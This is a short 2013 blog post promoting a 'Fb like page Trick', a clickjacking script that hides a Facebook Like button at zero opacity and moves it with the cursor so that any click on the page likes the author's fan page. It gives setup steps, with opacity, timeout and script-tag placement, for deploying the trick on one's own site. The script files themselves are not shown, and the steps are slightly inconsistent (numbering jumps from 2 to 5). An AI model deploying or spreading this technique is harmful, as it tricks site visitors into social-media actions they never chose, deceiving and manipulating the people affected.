Saturday 20 July 2013

Fb like page Trick

How It works:

-------------

The like button is made hidden and it moves along with the mouse.
So, wherever the user clicks, the like button is clicked and your fan page is liked.
Thus a lot of marketing to your site easily.
Instructions:

-------------

1. Modify config.js file in "src" folder to change fan page URL and other things.
Comments are provided beside them to help you what they do exactly.

2. There is a time out function after which the like button will not be present(move) anymore.
"time" if set to 0 will make it stay forever(which is usually not preferred).


3. Set opacity to '0' before you run the script. Otherwise the like button will not be invisible.

How To Run The Script:

----------------------


1. Add these two lines just above "</head>" tag in your pages

-------------------------------------------------------------

<script language="javascript" src="src/config.js"></script>

--------------------------------------------------------------


2. Add this line just after "<body>" tag in your pages

-------------------------------------------------------------

<script language="javascript" src="src/like.js"></script>

-------------------------------------------------------------


5. Thats it. The script is ready to go.

like us..

https://www.facebook.com/pages/Un-known/601712363180975

0 comments:

Post a Comment